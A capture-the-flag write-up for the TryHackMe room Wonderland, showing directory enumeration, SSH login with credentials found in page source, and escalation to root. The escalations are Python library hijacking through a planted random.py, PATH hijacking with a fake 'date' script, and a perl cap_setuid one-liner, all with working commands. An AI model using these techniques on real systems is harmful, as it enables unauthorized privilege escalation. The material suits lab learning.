THM Writeup: Wonderland

Writeup for the TryHackMe room Wonderland

Hello! Today, let's solve TryHackMe's challenge Wonderland. This was a pretty fun room and I learned a lot. So, let's dive in!

Enumeration

As always, I start the process with Enumeration and first thing I do while enumerating is run an nmap scan. (You might notice different IP addresses for the machine, it's because I forgot to expand the time and my machine expired midway -_-)

β”Œβ”€β”€(kaliγ‰Ώkali)-[~]
└─$ nmap -sV -sC -Pn 10.10.149.95
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-12 06:48 EST
Nmap scan report for 10.10.149.95
Host is up (0.40s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
|   256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_  256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 331.56 seconds

Port 80 is open and the title is "Follow the white rabbit." As the room's theme is Alice in Wonderland, this makes sense. Let's visit the page and see what's happening here.

The webpage has a quote from Alice in Wonderland, and a picture of the rabbit. Next, I ran a Gobuster scan and found another directory /r.

β”Œβ”€β”€(kaliγ‰Ώkali)-[~/thm/wonderland]
└─$ gobuster dir -u http://10.10.254.173 --wordlist /usr/share/dirb/wordlists/common.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.254.173
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2024/01/12 09:28:27 Starting gobuster in directory enumeration mode
===============================================================
/img                  (Status: 301) [Size: 0] [--> img/]
/index.html           (Status: 301) [Size: 0] [--> ./]
/r                    (Status: 301) [Size: 0] [--> r/]
Progress: 4614 / 4615 (99.98%)
===============================================================
2024/01/12 09:31:13 Finished
===============================================================

Let's go to the new directory and see if there's anything useful.

Again, a quote from the book. I noticed something interesting here. The heading says "Keep Going" might it mean that there are more sub-directories here? I ran another Gobuster scan and I found another directory! This time it's /a. Here too we find a quote and the title still says "Keep Going". Now, just a wild guess but I thought the directories /r and /a might mean it's trying to spell the word rabbit. So, I put /r/a/b/b/i/t and et voila!

Initial Foothold & User Shell

Now, the title changes to "Open the door and enter wonderland". This might mean something. I check the page source and sure enough, we have the credentials for the user alice!

I try to SSH with these credentials and we have a shell as alice. [Hacker Voice] I'm in.

β”Œβ”€β”€(kaliγ‰Ώkali)-[~/thm/wonderland]
└─$ ssh alice@10.10.254.173
alice@10.10.254.173's password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-101-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Jan 12 14:37:12 UTC 2024

  System load:  0.0                Processes:           101
  Usage of /:   18.9% of 19.56GB   Users logged in:     2
  Memory usage: 64%                IP address for eth0: 10.10.254.173
  Swap usage:   0%


0 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Fri Jan 12 14:01:18 2024 from 10.8.23.91
alice@wonderland:~$ 

I see there's a root.txt file in alice's home directory instead of a user.txt file. THM's machine page hints that "Everything is upside down here." So, I retrieve the user.txt file from the root folder with cat /root/user.txt.

Privilege Escalation

Now, I run sudo -l and see that alice can run the /usr/bin/python3.6 /home/alice /walrus_and_the_carpenter.py command as the user rabbit. We have to escalate privileges to the user rabbit somehow. We cannot edit the file walrus_and_the_carpenter.py but I can atleast look at what the code is doing.

import random
poem = """The sun was shining on the sea,
Shining with all his might:
He did his very best to make
The billows smooth and bright β€”
And this was odd, because it was
The middle of the night.

The moon was shining sulkily,
Because she thought the sun
Had got no business to be there
After the day was done β€”
"It’s very rude of him," she said,
"To come and spoil the fun!"

...SNIP...

"I weep for you," the Walrus said.
"I deeply sympathize."
With sobs and tears he sorted out
Those of the largest size.
Holding his pocket handkerchief
Before his streaming eyes.

"O Oysters," said the Carpenter.
"You’ve had a pleasant run!
Shall we be trotting home again?"
But answer came there none β€”
And that was scarcely odd, because
They’d eaten every one."""

for i in range(10):
    line = random.choice(poem.split("\n"))
    print("The line was:\t", line)

The script is reading this poem and printing some random lines from it. What's interesting here is that the script imports the random library. Right now, python is interpreting random as the python library. But, if we create a random.py, the code will import that and it might give us an elevated shell. This is known as python library hijacking.

Let's create a random.py file in alice's home directory.

import os
import pty

pty.spawn("/bin/bash")

Now, let's run the command as user rabbit and bingo! This gives us an elevated shell as user rabbit.

alice@wonderland:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
rabbit@wonderland:~$ 

Now, rabbit's home directory has only one file, the binary executable teaParty. I transfer this on my host machine and execute it.

β”Œβ”€β”€(kaliγ‰Ώkali)-[~/thm/wonderland]
└─$ ./teaParty       
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by Fri, 12 Jan 2024 10:49:02 -0500
Ask very nicely, and I will give you some tea while you wait for him

So, this tells me that "Mad Hatter" will be here soon. Judging from the /etc/passwd file there is a user named hatter. I also examine the contents of teaParty and see that date variable can be hijacked. This can give us an elevated shell as hatter.

β”Œβ”€β”€(kaliγ‰Ώkali)-[~/thm/wonderland]
└─$ strings teaParty      
/lib64/ld-linux-x86-64.so.2
2U~4
libc.so.6
setuid
puts
getchar
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
Welcome to the tea party!
The Mad Hatter will be here soon.
/bin/echo -n 'Probably by ' && date --date='next hour' -R
Ask very nicely, and I will give you some tea while you wait for him
Segmentation fault (core dumped)
;*3$"
GCC: (Debian 8.3.0-6) 8.3.0
...SNIP...

First, I will set the PATH to /tmp directory so whenever the binary file will look for the PATH it will first check the /tmp folder.

rabbit@wonderland:/home/rabbit$ export PATH=/tmp:$PATH
rabbit@wonderland:/home/rabbit$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

Now, we will create a date file in /tmp directory with the following contents and make it executable with chmod +x date.

date
#!/bin/bash
/bin/bash

This is known as path hijacking. What our binary file is doing is setting the arrival of hatter as the date. Now, with the PATH variable set, the file will look for date under /tmp directory and when it finds the shell script, it will execute the command and give us an elevated shell as hatter.

Now, let's execute the binary.

rabbit@wonderland:/home/rabbit$ ./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$

Et voila! We have the shell as hatter. Under hatter's home directory there is a single file called password.txt which just stores the password in cleartext. I am guessing this is hatter's password like we had alice's password. SSH-ing to hatter with this password gives me full shell.

Now, I run the usual linpeas.sh and find that perl executable has a capability which can help me escalated privileges.

/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep

Check out the following resources to learn more about linux capabilities.

With the help of above resource, I find a one-liner perl code to gain root privileges. I execute and bingo! The TryHackMe room Wonderland is solved!

hatter@wonderland:/tmp$ perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
root@wonderland:/tmp# whoami
root
root@wonderland:/tmp#

Find the root flag under /home/alice/root.txt. I learned a lot about path hijacking and linux capabilties with this room. Thank you for reading and I will see you in the next writeup. Adios!

Last updated